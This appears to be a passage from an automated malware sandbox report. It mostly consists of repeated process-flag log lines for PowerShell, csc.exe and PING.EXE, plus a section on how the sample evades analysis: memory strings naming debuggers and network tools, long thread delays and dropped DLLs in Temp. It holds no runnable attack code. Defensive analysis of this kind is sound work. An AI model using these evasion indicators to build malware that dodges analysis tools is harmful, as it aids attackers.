              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE11976
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE11126
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE12392
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE11328
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8327
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5321Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4484Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 740Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 733Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 4999Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 4520Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 543Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5326
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3148
              Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 4598
              Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 5141
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zozwmnym.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -33000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32759s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32648s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32532s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32419s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32308s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -32193s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -31954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXE TID: 7612Thread sleep time: -31736s >= -30000sJump to behavior
